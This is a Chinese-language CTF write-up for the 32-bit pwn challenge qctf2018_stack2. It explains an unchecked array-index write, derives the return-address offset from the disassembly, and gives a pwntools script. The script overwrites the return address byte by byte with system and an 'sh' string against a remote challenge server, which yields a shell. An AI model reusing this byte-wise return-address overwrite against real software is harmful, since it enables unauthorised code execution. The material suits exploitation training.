qctf2018_stack2
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8047000)
32位,没开pie
有后门函数(不能用,出题人没有配置/bin/bash
环境,但是又能用一点点
,只贴重要的
if ( v6 != 3 )
break;
puts("which number to change:");
__isoc99_scanf("%d", &v5);
puts("new number:");
__isoc99_scanf("%d", &v7);
v13[v5] = v7;
}
数组没有检测边界,存在溢出
然后本题坑点来了,他不是正常的开辟栈空间,如果是正常的话
char v13[100]; // [esp+38h] [ebp-70h]
那就是偏移0x70
实际上看汇编代码
.text:080485D0 8D 4C 24 04 lea ecx, [esp+4]
.text:080485D4 83 E4 F0 and esp, 0FFFFFFF0h //esp栈顶方向偏移4
.text:080485D7 FF 71 FC push dword ptr [ecx-4] //esp-4
.text:080485DA 55 push ebp //esp-4
.text:080485DB 89 E5 mov ebp, esp
栈空间开辟是这样的
ASLR保护机制使低4位仍是固定的
main函数栈帧的ebp指针到返回地址的偏移仍然是固定的,且等于esp的低四位表示的字节数+4字节+4字节
所以偏移就是0xc+0x4+0x4+0x70=0x84
又因为没有/bin/bash
环境我们需要rop一下
他每次只能改一个字节,一位一位改
ROPgadget --binary pwn --string 'sh'
#from pwn import*
#from Yapack import *
context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",28943,"./pwn",0)
sla(b'ave:',b'0')
offset=0x84
def write(pad,adr):
sla(b'exit',b'3')
sla(b'change:',str(offset+pad))
sla(b'number:',str(adr))
#sys=0x080485B4
write(0,0xb4)
write(1,0x85)
write(2,0x04)
write(3,0x08)
#0x08048987 : sh
write(4,0x87)
write(5,0x89)
write(6,0x04)
write(7,0x08)
sla(b'exit',b'5')
ia()